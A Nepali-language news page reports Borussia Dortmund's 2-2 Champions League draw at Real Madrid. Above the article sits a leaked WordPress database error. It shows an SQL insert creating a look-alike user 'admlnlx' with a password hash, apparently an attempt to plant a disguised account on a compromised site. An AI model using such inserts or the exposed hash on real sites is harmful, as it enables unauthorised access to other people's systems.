WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BL1gKaU33rnrguY5U.2xKgpkxHanHP1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 02:21:48', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर २३–
जर्मन क्लब बोरुसिया डर्टमुण्डले साबिक विजेता स्पेनिस क्लब रियल मड्रिडलाई बराबरीमा रोकेको छ । र च्याम्पियन्स लिग अन्तर्गत समूह एफको विजेता बनेको छ।
बुधबार राति रियल मड्रिडको मैदान बर्नाबेउमा भएको खेलमा बोरुसिया डर्टमुन्डले साविकको विजेतन रियल मड्रिडसँग २–२ को बराबरी खेलेको हो।
घरेलु टोलीले आफ्नो अग्रता जोगाउन नसक्दा समूह उपविजेतामा सीमित भयो। रियलका लागि दुवै गोल करिम बेन्जिमाले गरे। बोरुसिया डर्टमुण्डका लागि पिएर एमरिक र मार्को रेउसले गोल गरेका थिए।
रियलका लागि समूह विजेता बन्न जित आवश्यक थियो भने डर्टमुण्डका लागि बराबरी भए पुग्थ्यो।